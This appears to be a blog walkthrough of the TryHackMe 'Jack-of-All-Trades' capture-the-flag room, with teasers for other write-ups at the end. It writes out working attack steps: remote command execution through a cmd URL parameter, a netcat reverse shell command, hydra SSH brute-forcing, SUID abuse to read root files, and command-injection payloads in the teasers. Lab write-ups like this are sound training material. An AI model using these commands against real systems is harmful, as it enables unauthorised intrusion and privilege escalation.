Skip to main content

Jack-of-All-Trades


Jack-of-All-Trades




First of all, this write up is quite long so be patient and stay tunned coz it's a fun box and you may 
learn something new so take your notes and let's jump into this machine

starting with enumeration we ganna use Nmap for that to see what ports and services are running



as we can see there are web service and ssh but both of them running on different ports so keep that in mind 
let's go to the website and check this out but first, we need to allow HTTP to run port 22 you need to follow these steps 

1- Select and copy the following preference name

network.security.ports.banned.override

2- In a new tab, type or paste about:config in the address bar and press Enter/Return. Click the button promising to be careful.

3- In the search box above the list, type or paste ports and pause while the list is filtered

If the above-listed preference exists:

4- Double-click it and add a comma to the end of the list followed by the port number you need to allow. No spaces. Then click OK.

If the above-listed preference does not exist:

5- right-click anywhere on the page and choose New > String

6- In the preference name dialog, paste the name you copied and click OK

7- In the preference value dialog, type in the port number you need to allow, then click OK.

after applying these steps go and open the URL http://machine-IP:22



now we got webpage and let's view its source and see if something hidden 



as we can see there is a note that refers to hidden page /recovery.php and some hash that we need to crack

let's first crack this it seems like base64 you can use online tools or your terminal 

the cracked note was 

Remember to wish Johny Graves well with his crypto jobhunting! His encoding systems are amazing! 
Also gotta remember your password: you-ganna-found-password-here

and also we have a name so let's search this



so we have found a twitter account take a look at his twitter coz he identifies the exact hashing methodology

now let's visit that page /recovery.php



it requires username and password let's take a look at the source page 



there is another hash let's crack it with the methodology that Johny Graves tweets.
the cracked note was 

Remember that the credentials to the recovery login are hidden on the homepage! 
I know how forgetful you are, so here's a hint: bit.ly/2TvYQ2S

let's visit that link



I didn't know exactly what is this but I think he is referring to dinosaur image located in home page
so let's save it you can save it directly or go to /assets you ganna find all pictures that are in home page

first one called stego.jpg so from its name I think he refers to use steghide 

use: steghide extract -sf stego.jpg 

this will extract the image but you ganna asked for password this password what we have found in the first cracked note 
with base64 encryption method 



as you can see we have got a funny message said that this isn't the one xD 
so let's try the second one header.jpg




yes this is it you now got username and password we ganna use those in recovery page we found so let's do it



there is a message said 
GET me a 'cmd' and I'll run it for you Future-Jack. 
I think he writes GET in upper case referring to GET method so we ganna use URL and also he referred to use cmd and this technique is not new 
there are payloads in your kali machine that uses the same method so let's add cmd parameter and give it a command and see what happened 

use: http://machine-IP:22/nnxhweOV/index.php?cmd=ls



as we can see we have now RCE and we were able to list directory file so I will use one line Netcat reverse shell
first set up your netcat listener 

use: nc -nvlp 4444

second, use this payload in cmd parameter 

use: nc -e /bin/sh your-machine-IP 4444


*pro tip if you wanna convert Netcat shell to regular shell just use this

/usr/bin/script -qc /bin/bash /dev/null

and now we got our shell 
if we navigate to /home directory you ganna find jack home but you can't access it but you will see an interesting file
called jacks_password_list 



cat it and take its list and save it in your machine as txt file coz you ganna use hydra to brute force ssh



use: hydra -l jack -P jack-passwords-list-path -s 80 ssh://machine-IP

-s 80 to tell hydra that ssh is running in port 80 instead of 22 go ahead and run this you ganna get jack password



after login you ganna see only one pic in jack's home go ahead and download it 
you can download anything from ssh using SCP 

use: scp user.jpg your-username@your-machine-IP:/your-dir


you ganna asked for your local ssh password

after downloading it go ahead and just open it don't try to do what is did "trying to extract data from it xD"
you ganna find the user flag! 



user flag Done! ✌

now time from root flag 

use: sudo -l 



looks like jack can't run any sudo command! so let's find out what executable file we can find

use: find / -type f -user root -perm -4000 -exec ls -ldb {} \; 2>>/dev/null 



as we can see we can run strings as root!

so let's do it 

use: strings /root/root.txt 

 

that's it Jack-of-All-Trades rooted! ✌

I hope you enjoyed this fun machine see you in another one.


  









Comments

Post a Comment

Popular posts from this blog

Plethora

Plethora Tryhackme | Plethora   we will start with enumeration we ganna use Nmap to see what ports and services are running  as we can see we have a lot keep them in txt file we ganna use some of them later but for now we have port 80 is open which means wh have a web service up and running  as we can see we have a web page  let's take a look at the source page  ok let's open one by one of that machines let's start with DVWA ------------------------------------ DVWA DVWA is a well-known vul machine with username: admin and password: password  log in and go to command injection tap this vulnerability is about running a command on the server side so  we ganna use it to capture our flag  use: ping bing.com;cat /flag.txt flag 1 Done! ✌ ------------------------------------ XVWA as we did with DVWA we ganna do it here navigate to OS Command injection tap  and run this  use: ping bing.com;cat /flag.txt flag 2 Done! ✌ ------------------------------------ Mutillidae Mutillidae also
Post a Comment
Read more

Easy Steganography

Easy Steganography Tryhackme | Easy steganography First, you need to download the attached file and unzip it you will end up with 4 images each one contains its flag  Flag 1   if you open this image you will see a normal pic without any interesting info  and if you try to use "ExifTool" or "binwalk" you will get normal information  but if you use to try to take a look with "hexdump" you gonna earn your flag ✌ use :  hexdump -C flag1.jpeg | grep S   Flag 2 flag 2 is the same image as flag1 no interesting info so we will use "binwalk" here  use:   binwalk flag2.jpeg as you can see there is another image within the flag2 image so we need to extract it  use:  binwalk --dd '.*' flag2.jpeg as you can see after extracting a new folder came up navigate to that folder and you will see  a new image called 1326F just open it and you will get flag2 ✌ Flag 3 This one is so simple you just need to use strings command to capture the flag ✌ use: strings
Post a Comment
Read more